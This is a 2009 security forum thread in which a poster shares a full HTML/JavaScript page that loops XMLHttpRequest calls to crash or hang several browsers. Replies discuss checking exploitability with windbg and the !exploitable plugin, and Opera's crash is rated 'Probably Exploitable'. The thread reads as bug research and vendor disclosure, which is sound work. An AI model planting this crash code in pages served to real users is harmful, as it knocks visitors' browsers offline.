Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do we crash systems, browsers, or otherwise bring things to a halt, and how do we protect those things? 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Cycled XMLHttpRequest bug
Posted by: p0dge
Date: July 29, 2009 03:37AM

I've found a bug with cycled asynchronous XMLHttp in different browsers. If you create html page with following code
<html>
	<head>
	<script>
		function getXmlHttp(){
		var xmlhttp;
		try {
		xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
		} catch (e) {
		try {
		xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
		} catch (E) {
		xmlhttp = false;
		}
		}
		if (!xmlhttp && typeof XMLHttpRequest!='undefined') {
		xmlhttp = new XMLHttpRequest();
		}
		return xmlhttp;
		}
	</script>
	<script>
		function getXmlHttpHACK(){
		var xmlhttp = getXmlHttp()
		xmlhttp.open('GET', 'drupal', false);
		xmlhttp.send(null);
		if(xmlhttp.status == 404) {
		getXmlHttpHACK();
		}
		}
	</script>
	<script>
		var xmlhttp = getXmlHttp()
		xmlhttp.open('GET', 'drupal', true);
		xmlhttp.onreadystatechange = function() {
		if (xmlhttp.readyState == 4) {
		if(xmlhttp.status == 404) {
		getXmlHttpHACK();
		}
		}
		};
		xmlhttp.send(null);
	</script>
	</head>
</html>
and open it, you will see how different browsers begin to devour system resources.

- Internet Explorer 7/8 shows a message "Stack overflow at line:23" and stop page loading
- Firefox 3.5 and Chrome handles this correctly
- Opera 10 crashes
- Apple Safari hangs

I'm not strong in browsers vulnerabilities so I want to know if this is a simple crash bug or it's Buffer Overflow which allows to run shell code



Edited 1 time(s). Last edit at 07/29/2009 03:43AM by p0dge.

Options: ReplyQuote
Re: Cycled XMLHttpRequest bug
Posted by: p0deje
Date: July 29, 2009 11:58AM

however, i've reported this as security issue to browsers companies

p.s. i'm the author of thread :)

Options: ReplyQuote
Re: Cycled XMLHttpRequest bug
Posted by: Gareth Heyes
Date: July 29, 2009 12:18PM

Stack overflow isn't exploitable IMHO, if you want to find if a particular crash is exploitable, configure windbg and capture the crash dump. Then install the !exploitable plugin to analyse the data. This will give you a good indication if the crash is exploitable or not.

Windbg tutorial:-
http://www.debuginfo.com/articles/easywindbg.html

!exploitable:-
http://www.codeplex.com/msecdbg

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Cycled XMLHttpRequest bug
Posted by: p0dge
Date: July 30, 2009 02:30AM

thanks for the links, but i didn't manage to debug browser and analyze it with !exploitable

will try to investigate it later

Options: ReplyQuote
Re: Cycled XMLHttpRequest bug
Posted by: p0deje
Date: August 03, 2009 04:23AM

!exploitable didn't manage to define if error is exploitable for IE and Safari
but for Opera it said "Probably Exploitable"

---------
http://p0deje.blogspot.com

Options: ReplyQuote


Sorry, only registered users may post in this forum.